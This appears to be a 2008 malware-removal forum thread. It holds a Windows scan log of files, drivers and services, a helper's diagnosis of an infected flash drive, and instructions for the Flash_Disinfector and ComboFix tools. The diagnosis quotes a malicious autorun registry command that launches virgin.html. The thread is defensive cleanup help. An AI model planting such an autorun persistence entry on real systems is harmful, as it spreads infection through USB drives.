    2008-08-29 11:37:57 ----N---- C:\WINDOWS\system32\mssha.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcperf.exe
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcfxcommon.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mmcex.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\microsoft.managementconsole.dll
    2008-08-29 11:37:51 ----N---- C:\WINDOWS\system32\mdmxsdk.dll
    2008-08-29 11:37:46 ----N---- C:\WINDOWS\system32\l2gpstore.dll
    2008-08-29 11:37:46 ----N---- C:\WINDOWS\system32\kmsvc.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdpash.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdnepr.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdiultn.dll
    2008-08-29 11:37:45 ----N---- C:\WINDOWS\system32\kbdbhc.dll
    2008-08-29 11:37:39 ----N---- C:\WINDOWS\system32\smtpapi.dll
    2008-08-29 11:37:39 ----N---- C:\WINDOWS\system32\rwnh.dll
    2008-08-29 11:37:37 ----N---- C:\WINDOWS\system32\comsdupd.exe
    2008-08-29 11:37:35 ----N---- C:\WINDOWS\system32\hsfcisp2.dll
    2008-08-29 11:37:32 ----A---- C:\WINDOWS\003084_.tmp
    2008-08-29 11:37:31 ----N---- C:\WINDOWS\system32\faxpatch.exe
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapsvc.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapqec.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappprxy.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapphost.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappgnui.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eappcfg.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapp3hst.dll
    2008-08-29 11:37:30 ----N---- C:\WINDOWS\system32\eapolqec.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3ui.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3svc.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3msm.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3gpclnt.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3dlg.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3cfg.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dot3api.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dimsroam.dll
    2008-08-29 11:37:29 ----N---- C:\WINDOWS\system32\dimsntfy.dll
    2008-08-29 11:37:28 ----N---- C:\WINDOWS\system32\dhcpqec.dll
    2008-08-29 11:37:27 ----N---- C:\WINDOWS\system32\credssp.dll
    2008-08-29 11:37:25 ----N---- C:\WINDOWS\system32\bitsprx4.dll
    2008-08-29 11:37:24 ----N---- C:\WINDOWS\system32\azroles.dll
    2008-08-29 11:37:24 ----N---- C:\WINDOWS\system32\ati3d1ag.dll
    2008-08-29 11:37:23 ----N---- C:\WINDOWS\system32\ati2dvaa.dll
    2008-08-29 11:37:15 ----N---- C:\WINDOWS\system32\aaclient.dll
    2008-08-29 10:39:28 ----D---- C:\Documents and Settings\All Users\Application Data\TEMP
    2008-08-29 10:39:19 ----D---- C:\Program Files\WMA-MP3.com
    2008-08-25 10:59:04 ----HDC---- C:\WINDOWS\$NtUninstallKB952954_0$
    2008-08-25 10:58:59 ----HDC---- C:\WINDOWS\$NtUninstallKB946648_0$
    2008-08-25 10:58:54 ----HDC---- C:\WINDOWS\$NtUninstallKB953839$
    2008-08-25 10:58:50 ----HDC---- C:\WINDOWS\$NtUninstallKB950974_0$
    2008-08-25 10:57:19 ----HDC---- C:\WINDOWS\$NtUninstallKB951072-v2$
    2008-08-25 10:57:13 ----HDC---- C:\WINDOWS\$NtUninstallKB952287_0$
    2008-08-25 10:56:44 ----HDC---- C:\WINDOWS\$NtUninstallKB951066_0$
    2008-08-11 14:22:42 ----D---- C:\WINDOWS\nview
    2008-08-11 14:22:42 ----A---- C:\WINDOWS\system32\nvudisp.exe
    2008-08-07 09:57:28----A----C:\Documents and Settings\All Users\Application Data\xml62D.tmp
    2008-07-29 16:57:47 ----D---- C:\Pipeline
    2008-07-29 16:52:10 ----A---- C:\WINDOWS\system32\pscVSWIA.dll
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\pscUE116.dll
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\pscNE116.exe
    2008-07-29 16:52:09 ----A---- C:\WINDOWS\system32\PSCLE116.dll
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\javaws.exe
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\javaw.exe
    2008-07-22 10:35:53 ----A---- C:\WINDOWS\system32\java.exe
    2008-07-22 10:29:56 ----D---- C:\Program Files\MSXML 6.0
    2008-07-22 10:27:21 ----HDC---- C:\WINDOWS\$NtUninstallKB951748_0$
    2008-07-16 13:20:50 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Blackberry Desktop
    2008-07-15 15:45:51 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\Research In Motion
    2008-07-15 15:45:33 ----D---- C:\Documents and Settings\[USER].[DOMAIN].002\Application Data\InstallShield
    2008-07-15 15:03:42 ----D---- C:\Program Files\Common Files\Sonic Shared
    2008-07-15 15:02:19 ----D---- C:\Program Files\Common Files\Research In Motion
    2008-07-15 15:02:18 ----D---- C:\Program Files\Research In Motion
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbdkor.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbdjpn.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd106.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd103.dll
    2008-07-10 16:11:20 ----A---- C:\WINDOWS\system32\kbd101c.dll
    2008-07-10 16:11:17 ----A---- C:\WINDOWS\system32\kbd101b.dll
    2008-07-09 19:16:28 ----A---- C:\WINDOWS\PSEXESVC.EXE
    2008-07-07 14:13:55 ----HDC---- C:\WINDOWS\$NtUninstallKB951376-v2_0$
    2008-07-07 14:11:54 ----HDC---- C:\WINDOWS\$NtUninstallKB951698_0$
    2008-07-07 14:11:49 ----HDC---- C:\WINDOWS\$NtUninstallKB950762_0$
    2008-07-07 14:11:43 ----HDC---- C:\WINDOWS\$NtUninstallKB950760$
    2008-06-24 14:05:46 ----D---- C:\Program Files\IKEA HomePlanner
    2008-06-24 14:05:32 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
    2008-06-10 13:07:36 ----D---- C:\Program Files\Microsoft Silverlight

    List of drivers

    R1 AmdK8;AMD Processor Driver; C:\WINDOWS\system32\DRIVERS\AmdK8.sys [2005-03-09 36352]
    R1 BANTExt;Belarc SMBios Access; C:\WINDOWS\system32\System32\Drivers\BANTExt.sys []
    R2 wntpport;wntpport; C:\WINDOWS\system32\drivers\wntpport.sys [2001-01-19 28416]
    R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\Drivers\GEARAspiWDM.sys [2006-09-19 15664]
    R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
    R3 hidusb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
    R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2005-07-13 3851264]
    R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-04 12160]
    R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2005-12-10 3536768]
    R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\WINDOWS\system32\DRIVERS\NVENETFD.sys [2005-07-29 34048]
    R3 nvnetbus;NVIDIA Network Bus Enumerator; C:\WINDOWS\system32\DRIVERS\nvnetbus.sys [2005-07-29 12928]
    R3 RimVSerPort;RIM Virtual Serial Port v2; C:\WINDOWS\system32\DRIVERS\RimSerial.sys [2007-01-18 26496]
    R3 ROOTMODEM;Microsoft Legacy Modem Driver; C:\WINDOWS\System32\Drivers\RootMdm.sys [2004-08-04 5888]
    R3 SydexFDD;Sydex Diskette Driver; \??\C:\WINDOWS\system32\Drivers\sydexfdd.sys []
    R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
    R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
    R3 usbohci;Microsoft USB Open Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbohci.sys [2008-04-13 17152]
    S3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
    S3 atinevxx;ATI WDM Rage Theater Video NSP; C:\WINDOWS\system32\DRIVERS\atinevxx.sys [2004-09-15 186368]
    S3 CCDECODE;Closed Caption Decoder; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
    S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\HdAudio.sys [2005-01-07 145920]
    S3 MSTEE;Microsoft Streaming Tee/Sink-to-Sink Converter; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
    S3 MVDCODEC;ATI WDM Specialized MVD Codec; C:\WINDOWS\system32\DRIVERS\atinmdxx.sys [2004-09-15 13824]
    S3 NABTSFEC;NABTS/FEC VBI Codec; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
    S3 NdisIP;Microsoft TV/Video Connection; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
    S3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
    S3 RimUsb;BlackBerry Smartphone; C:\WINDOWS\System32\Drivers\RimUsb.sys [2007-05-31 22656]
    S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
    S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
    S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
    S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
    S3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
    S3 WSTCODEC;World Standard Teletext Codec; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
    S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

    List of services

    R2 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2007-09-06 110592]
    R2 Bonjour Service;##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762##; C:\Program Files\Bonjour\mDNSResponder.exe [2006-02-28 229376]
    R2 CCALib8;Canon Camera Access Library 8; C:\Program Files\Canon\CAL\CALMAIN.exe [2006-03-30 96341]
    R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2005-12-10 131139]
    R2 Stuffit Archive Name Service;Stuffit Archive Name Service; C:\Program Files\Smith Micro\StuffIt11\ArcNameService.exe [2007-10-08 157000]
    R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
    R2 WinVNC4;VNC Server Version 4; C:\Program Files\RealVNC\VNC4\WinVNC4.exe [2006-05-12 439248]
    R3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2007-04-25 654848]
    R3 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2007-09-26 503608]
    S2 Roxio Upnp Server 9;Roxio Upnp Server 9; C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe [2007-07-24 358896]
    S2 RoxLiveShare9;LiveShare P2P Server 9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe [2007-08-16 309744]
    S2 RoxWatch9;Roxio Hard Drive Watcher 9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe [2007-08-16 166384]
    S3 Adobe Version Cue CS3;Adobe Version Cue CS3; C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe [2007-03-20 153792]
    S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
    S3 AVVBDB;AVVBDB; C:\DOCUME~1\[USER]~1.002\LOCALS~1\Temp\AVVBDB.exe [2008-09-05 564096]
    S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2007-02-14 138168]
    S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
    S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-06-20 89136]
    S3 Roxio UPnP Renderer 9;Roxio UPnP Renderer 9; C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe [2007-07-24 88560]
    S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-08-16 1092080]
    S3 SandraDataSrv;SiSoftware Database Agent Service; C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\Win32\RpcDataSrv.exe [2006-11-24 123064]
    S3 SandraTheSrv;SiSoftware Sandra Agent Service; C:\Program Files\SiSoftware\SiSoftware Sandra Lite XIb\RpcSandraSrv.exe [2006-11-24 1138880]

    -----------------EOF-----------------
     
    ynot2k,
    #3
  5. 2008/09/08
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    It looks as though an infected flash drive might have been attached to this computer. Are you able to have the user plug in the flash drive used and run a tool? The following is the evidence I'm referring to.

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountp oints2\{3fb0568b-c02e-11db-b87c-00148535f4e3}]
    shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL virgin.html


    You need to run a tool that will likely reboot the machine and resume running. The internet connection will also be disabled after starting the tool. It will however, reconnect after restart. Are you able to do that remotely? If so, continue on.


    For the flash drive, download Flash_Disinfector by sUBs and save it to the desktop:

    NOTE: In the event you already have Flash_Disinfector, this is a new version that I need you to download.

    • Plug in the USB flash drive.
    • Double-click Flash_Disinfector.exe to run it.
    • Follow any prompts that may appear.
    • The desktop will vanish for a while, and then reappear. This is normal.
    • Wait until the program has finished scanning, then please exit the program. If more than 1 flash drive is used, run the tool with each plugged in.


    Next, download ComboFix by sUBs from here, saving the file to the desktop.


    Please disable realtime protection applications as they sometimes interfere with the tool. Check this link for applicable programs.

    • Close all open programs and windows
    • Double click combofix.exe and follow the prompts.
    • It may reboot the computer and resume running after logon. Wait for it to complete. When finished, it will open a log for you. Post that log in your next reply.
    Note: Do not mouseclick combofix's window while its running. That may cause it to stall
     
    noahdfear,
    #4
  6. 2008/09/09
    ynot2k

    ynot2k Inactive Thread Starter

    Joined:
    2008/02/04
    Messages:
    21
    Likes Received:
    0
    Hi noahdfear -- combofix did not produce a log for me. when i ran it on my machine in my lab, i got an error about renaming something.

    anyways, i ran it on the infected machine .... and it reported some rootkit activity and would need to reboot. so it restarted. i noticed that it ran on reboot/login. no log was produced (i haven't looked for it). but i did notice that the infection seems to have magically disappeared.

    SO THANKS! now i'm going to go and find out what combofix does...

    All the best,
    ynot2k
     
    ynot2k,
    #5
  7. 2008/09/10
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    On the infected machine, rename ComboFix.exe and run it again. It should complete and produce a log.

    RE: your lab machine. Safe to assume it is properly named as ComboFix.exe? Try a fresh download and this time change it's name prior to saving it.
     
    noahdfear,
    #6

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...